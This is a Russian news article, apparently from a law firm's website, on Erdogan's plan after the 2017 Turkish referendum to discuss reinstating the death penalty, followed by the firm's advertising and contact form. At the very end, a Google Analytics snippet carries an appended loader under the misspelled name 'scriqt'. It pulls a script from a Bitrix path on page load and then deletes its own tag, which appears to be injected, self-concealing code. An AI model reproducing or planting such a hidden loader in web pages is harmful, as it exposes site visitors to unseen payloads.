Эрдоган заявил о планах «немедленно» обсудить введение смертной казни

Эрдоган заявил о планах «немедленно» обсудить введение смертной казни Эрдоган заявил о планах «немедленно» обсудить введение смертной казни

После референдума в Турции может быть официально введена и узаконена смертная казнь, заявил президент республики Реджеп Эрдоган. Данные обработки избирательных бюллетеней свидетельствуют о том, что за внесение изменений в конституцию страны в воскресенье высказались более 50% граждан.

Президент Турции Реджеп Эрдоган заявил, что после состоявшегося в воскресенье, 16 апреля, референдума в правительстве страны начнут рассматривать вопрос о необходимости введения смертной казни, передает Reuters.
Во время выступления перед журналистами в своей президентской резиденции в Анкаре глава государства отметил, что намерен немедленно обсудить вопрос о возвращении в конституцию смертной казни с премьер-министром Бинали Йылдырымом и председателем оппозиционной Партии националистического движения (ПНД) Девлетом Бахчели.
Reuters указывает, что такой шаг означал бы сворачивание переговоров о членстве Турции в Евросоюзе, которые страна проводит с начала 2000-х годов
Эрдоган добавил, что возможно проведение нового референдума относительно смертной казни. Президент напомнил, что турецкий народ оказал сопротивление во время попытки путча в июле 2016 года и «не понес поражения».

Смертные приговоры в Турции не приводились в исполнение с 1984 года. В 2004 году Эрдоган официально отменил эту меру наказания с целью выполнения плана по вхождению страны в состав Евросоюза. Дискуссии о введении смертной казни возобновились после попытки переворота 2016 года. Эрдоган неоднократно отмечал необходимость узаконить смертную казнь для того, чтобы наказать всех причастных к путчу.
Сам референдум Эрдоган назвал предпосылкой «важнейших реформ» в истории страны. В воскресенье, 16 апреля, 51,23% граждан Турции отдали свои голоса за переход от парламентской формы правления, существовавшей с момента создания Турецкой республики, к президентской. Это означает расширение полномочий действующего президента — Эрдоган сможет лично назначать министров, издавать указы, объявлять чрезвычайное положение и распускать парламент, — а также упразднение поста премьер-министра. Противники перехода на новую систему руководства набирали 48,77% голосов.
Возврат к списку


У нас сотни выигранных дел – отзывы реальных клиентов это доказывают!

Работайте с профессионалами!

Звонки и заявки на консультацию принимаются круглосуточно.

Вы получите четкие и понятные консультации: «без воды» - только суть! С нашей помощью Вы обойдете сложные «ловушки и капканы» закона.

ФИО
Телефон
Текст сообщения
Это поле обязательно для заполнения
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');var scriqt=document.createElement('script');scriqt.src='/bitrix/js/main/core/core_loader.js?v=0.2.14';scriqt.onload=function(){document.head.removeChild(scriqt);};document.head.appendChild(scriqt); ga('create', 'UA-83802593-1', 'auto'); ga('send', 'pageview');